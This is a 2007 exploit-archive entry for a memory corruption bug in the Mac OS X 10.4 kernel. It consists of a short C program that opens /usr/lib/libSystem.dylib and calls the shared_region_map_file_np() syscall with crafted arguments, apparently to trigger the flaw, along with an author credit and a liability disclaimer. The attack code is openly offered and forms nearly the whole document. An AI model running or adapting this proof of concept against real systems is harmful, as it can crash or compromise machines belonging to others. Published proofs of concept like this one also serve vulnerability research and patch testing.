# Title : Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory Corruption
# Published : 2007-01-21
# Author : Adriano Lima
/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.
REFERENCES
[1] Mac OS X Internals: A Systems Approach By Amit Singh
DISCLAIMER
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information provided, including any kind of information which is incomplete
or incorrect, will therefore be rejected.
*/
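#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc, char **argv) {
    int fd;

    /* Open a file whose descriptor is handed to the system call. */
    if ((fd = open("/usr/lib/libSystem.dylib", O_RDONLY)) == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    /* Invoke shared_region_map_file_np() directly with the descriptor,
       the value 0x02000000 and two NULL pointers. */
    if (syscall(SYS_shared_region_map_file_np, fd, 0x02000000, NULL, NULL) == -1) {
        perror("shared_region_map_file_np");
        exit(EXIT_FAILURE);
    }

    exit(EXIT_FAILURE);
}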